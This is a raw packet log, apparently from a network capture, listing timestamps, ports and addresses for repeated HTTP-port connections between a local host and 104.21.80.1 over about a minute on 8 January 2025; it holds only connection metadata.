Jan 8, 2025 08:44:01.172691107 CET	80	49706	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:01.172768116 CET	49706	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:02.678423882 CET	49706	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:02.678627014 CET	49707	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:02.683464050 CET	80	49707	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:02.683507919 CET	80	49706	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:02.683666945 CET	49706	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:02.683716059 CET	49707	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:02.683852911 CET	49707	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:02.688591003 CET	80	49707	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:03.345909119 CET	80	49707	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:03.346004009 CET	49707	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:04.978604078 CET	49707	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:04.979123116 CET	49708	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:04.983735085 CET	80	49707	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:04.983799934 CET	49707	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:04.983985901 CET	80	49708	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:04.984059095 CET	49708	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:04.984251976 CET	49708	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:04.988960028 CET	80	49708	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:05.633984089 CET	80	49708	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:05.634067059 CET	49708	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:07.153757095 CET	49708	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:07.154088020 CET	49709	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:07.158991098 CET	80	49708	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:07.159009933 CET	80	49709	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:07.159060955 CET	49708	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:07.159100056 CET	49709	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:07.159228086 CET	49709	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:07.164002895 CET	80	49709	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:07.822917938 CET	80	49709	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:07.822983027 CET	49709	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:09.446326017 CET	49709	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:09.446604013 CET	49710	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:09.451474905 CET	80	49709	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:09.451492071 CET	80	49710	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:09.451560020 CET	49709	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:09.451618910 CET	49710	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:09.451776028 CET	49710	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:09.456619978 CET	80	49710	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:10.073746920 CET	80	49710	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:10.073810101 CET	49710	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:11.584671021 CET	49710	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:11.585035086 CET	49711	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:11.589823961 CET	80	49710	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:11.589931011 CET	80	49711	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:11.589951992 CET	49710	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:11.590074062 CET	49711	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:11.590373993 CET	49711	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:11.595130920 CET	80	49711	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:12.233028889 CET	80	49711	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:12.233089924 CET	49711	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:14.069073915 CET	49711	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:14.069524050 CET	49716	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:14.074184895 CET	80	49711	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:14.074254036 CET	49711	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:14.074299097 CET	80	49716	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:14.074358940 CET	49716	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:14.074604988 CET	49716	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:14.079339027 CET	80	49716	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:14.698978901 CET	80	49716	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:14.699040890 CET	49716	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:16.212290049 CET	49719	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:16.212290049 CET	49716	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:16.217138052 CET	80	49719	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:16.217210054 CET	49719	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:16.217257977 CET	80	49716	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:16.217314005 CET	49716	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:16.217458963 CET	49719	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:16.222254038 CET	80	49719	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:16.848417997 CET	80	49719	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:16.848475933 CET	49719	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:18.475176096 CET	49719	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:18.475442886 CET	49733	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:18.480252028 CET	80	49719	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:18.480268955 CET	80	49733	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:18.480325937 CET	49719	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:18.480359077 CET	49733	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:18.480537891 CET	49733	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:18.486418962 CET	80	49733	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:19.118756056 CET	80	49733	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:19.120320082 CET	49733	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:20.631581068 CET	49733	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:20.631838083 CET	49749	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:20.636672020 CET	80	49733	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:20.636687994 CET	80	49749	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:20.636740923 CET	49733	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:20.636770964 CET	49749	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:20.636873007 CET	49749	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:20.641619921 CET	80	49749	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:21.200469017 CET	80	49749	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:21.200531960 CET	49749	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:22.820776939 CET	49749	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:22.821150064 CET	49765	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:22.825809002 CET	80	49749	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:22.825867891 CET	49749	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:22.825910091 CET	80	49765	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:22.825972080 CET	49765	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:22.826100111 CET	49765	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:22.830816984 CET	80	49765	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:23.472223997 CET	80	49765	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:23.472296000 CET	49765	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:24.975514889 CET	49765	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:24.975953102 CET	49776	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:24.980531931 CET	80	49765	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:24.980586052 CET	49765	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:24.980767012 CET	80	49776	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:24.980825901 CET	49776	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:24.981040001 CET	49776	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:24.985789061 CET	80	49776	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:25.612215996 CET	80	49776	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:25.612292051 CET	49776	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:27.240850925 CET	49776	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:27.241257906 CET	49792	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:27.246860981 CET	80	49776	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:27.246922016 CET	49776	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:27.247030020 CET	80	49792	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:27.247190952 CET	49792	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:27.247229099 CET	49792	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:27.253026962 CET	80	49792	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:27.885174990 CET	80	49792	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:27.885377884 CET	49792	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:29.397129059 CET	49792	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:29.397387981 CET	49807	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:29.402169943 CET	80	49792	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:29.402226925 CET	80	49807	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:29.402259111 CET	49792	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:29.402311087 CET	49807	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:29.402479887 CET	49807	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:29.407326937 CET	80	49807	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:29.978251934 CET	80	49807	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:29.978313923 CET	49807	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:31.600467920 CET	49807	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:31.600784063 CET	49823	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:31.605479956 CET	80	49807	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:31.605537891 CET	49807	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:31.605597973 CET	80	49823	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:31.605669975 CET	49823	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:31.605812073 CET	49823	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:31.612489939 CET	80	49823	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:32.261640072 CET	80	49823	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:32.261847973 CET	49823	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:33.772268057 CET	49823	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:33.772589922 CET	49839	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:33.777461052 CET	80	49839	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:33.777477980 CET	80	49823	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:33.777575970 CET	49823	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:33.777595043 CET	49839	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:33.777914047 CET	49839	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:33.782676935 CET	80	49839	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:34.421993017 CET	80	49839	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:34.422058105 CET	49839	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:36.055712938 CET	49839	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:36.056016922 CET	49855	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:36.060766935 CET	80	49839	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:36.060827017 CET	49839	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:36.060836077 CET	80	49855	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:36.060905933 CET	49855	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:36.061043024 CET	49855	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:36.065839052 CET	80	49855	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:36.707886934 CET	80	49855	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:36.707967043 CET	49855	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:38.209544897 CET	49855	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:38.209769964 CET	49871	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:38.214519024 CET	80	49871	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:38.214675903 CET	80	49855	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:38.214752913 CET	49855	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:38.214849949 CET	49871	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:38.214849949 CET	49871	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:38.219640017 CET	80	49871	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:38.879929066 CET	80	49871	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:38.880352974 CET	49871	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:40.506433010 CET	49871	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:40.506715059 CET	49886	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:40.511466980 CET	80	49871	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:40.511508942 CET	80	49886	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:40.511538982 CET	49871	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:40.511583090 CET	49886	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:40.511753082 CET	49886	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:40.516598940 CET	80	49886	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:41.142518044 CET	80	49886	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:41.142580032 CET	49886	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:42.685101986 CET	49886	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:42.688987970 CET	49896	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:42.846530914 CET	80	49896	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:42.846580982 CET	80	49886	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:42.846611977 CET	49896	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:42.846641064 CET	49886	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:42.871694088 CET	49896	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:42.876580000 CET	80	49896	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:43.501418114 CET	80	49896	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:43.501468897 CET	49896	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:45.133403063 CET	49896	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:45.133666039 CET	49914	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:45.138350964 CET	80	49896	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:45.138430119 CET	49896	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:45.138493061 CET	80	49914	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:45.138593912 CET	49914	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:45.138725042 CET	49914	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:45.143487930 CET	80	49914	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:45.766542912 CET	80	49914	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:45.768373013 CET	49914	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:47.475209951 CET	49914	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:47.475552082 CET	49926	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:47.483134985 CET	80	49926	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:47.484379053 CET	49926	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:47.484566927 CET	49926	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:47.489098072 CET	80	49914	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:47.489306927 CET	80	49926	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:47.489365101 CET	49914	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:48.129406929 CET	80	49926	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:48.129497051 CET	49926	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:49.756422997 CET	49926	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:49.756705999 CET	49942	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:49.761447906 CET	80	49926	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:49.761475086 CET	80	49942	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:49.761528969 CET	49926	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:49.761578083 CET	49942	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:49.761737108 CET	49942	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:49.766483068 CET	80	49942	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:50.406974077 CET	80	49942	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:50.408377886 CET	49942	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:51.913547993 CET	49942	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:51.914239883 CET	49959	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:51.918584108 CET	80	49942	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:51.918643951 CET	49942	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:51.919080019 CET	80	49959	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:51.919152021 CET	49959	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:51.924940109 CET	49959	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:51.929702044 CET	80	49959	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:52.579974890 CET	80	49959	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:52.580034018 CET	49959	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:54.213736057 CET	49959	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:54.214011908 CET	49975	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:54.218835115 CET	80	49959	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:54.218877077 CET	80	49975	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:54.218905926 CET	49959	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:54.218949080 CET	49975	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:54.219134092 CET	49975	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:54.223954916 CET	80	49975	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:54.864738941 CET	80	49975	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:54.867331982 CET	49975	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:56.399843931 CET	49975	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:56.400126934 CET	49990	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:56.405023098 CET	80	49990	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:56.405038118 CET	80	49975	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:56.405077934 CET	49990	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:56.405103922 CET	49975	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:56.405364037 CET	49990	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:56.410078049 CET	80	49990	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:57.035424948 CET	80	49990	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:57.035506964 CET	49990	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:58.664529085 CET	49990	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:58.664796114 CET	50003	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:58.669548988 CET	80	49990	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:58.669581890 CET	80	50003	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:58.669642925 CET	49990	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:58.669678926 CET	50003	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:58.669764042 CET	50003	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:44:58.674551010 CET	80	50003	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:59.313751936 CET	80	50003	104.21.80.1	192.168.2.5
Jan 8, 2025 08:44:59.313925982 CET	50003	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:00.819024086 CET	50003	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:00.819355011 CET	50004	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:00.824182987 CET	80	50004	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:00.824244022 CET	50004	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:00.824453115 CET	50004	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:00.824506998 CET	80	50003	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:00.824568987 CET	50003	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:00.829210997 CET	80	50004	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:01.557617903 CET	80	50004	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:01.557818890 CET	50004	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:03.180543900 CET	50004	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:03.180931091 CET	50005	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:03.185563087 CET	80	50004	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:03.185646057 CET	50004	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:03.185816050 CET	80	50005	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:03.185899973 CET	50005	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:03.186043024 CET	50005	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:03.190758944 CET	80	50005	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:03.832396030 CET	80	50005	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:03.832465887 CET	50005	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:05.336333990 CET	50005	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:05.336582899 CET	50006	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:05.341502905 CET	80	50005	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:05.341521025 CET	80	50006	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:05.341566086 CET	50005	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:05.341598988 CET	50006	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:05.341713905 CET	50006	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:05.346604109 CET	80	50006	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:05.896019936 CET	80	50006	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:05.896205902 CET	50006	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:06.023324013 CET	80	50006	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:06.023488045 CET	50006	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:07.649108887 CET	50006	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:07.649403095 CET	50007	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:07.654119015 CET	80	50006	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:07.654191017 CET	50006	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:07.654217958 CET	80	50007	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:07.654290915 CET	50007	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:07.654402971 CET	50007	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:07.659195900 CET	80	50007	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:08.286063910 CET	80	50007	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:08.286125898 CET	50007	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:09.789772034 CET	50007	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:09.790096045 CET	50008	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:09.794910908 CET	80	50007	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:09.794936895 CET	80	50008	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:09.794982910 CET	50007	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:09.795054913 CET	50008	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:09.795150995 CET	50008	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:09.799931049 CET	80	50008	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:10.456854105 CET	80	50008	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:10.456944942 CET	50008	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:12.086324930 CET	50008	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:12.086611986 CET	50009	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:12.091506004 CET	80	50008	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:12.091521025 CET	80	50009	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:12.091583014 CET	50008	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:12.091623068 CET	50009	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:12.091746092 CET	50009	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:12.096466064 CET	80	50009	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:12.721060038 CET	80	50009	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:12.721153975 CET	50009	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:14.227251053 CET	50009	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:14.227627993 CET	50010	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:14.232212067 CET	80	50009	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:14.232275009 CET	50009	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:14.232400894 CET	80	50010	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:14.232481003 CET	50010	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:14.232621908 CET	50010	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:14.237379074 CET	80	50010	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:14.884509087 CET	80	50010	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:14.884577036 CET	50010	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:16.508702993 CET	50010	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:16.508985996 CET	50011	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:16.513691902 CET	80	50010	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:16.513761044 CET	50010	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:16.513808966 CET	80	50011	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:16.513885021 CET	50011	80	192.168.2.5	104.21.80.1
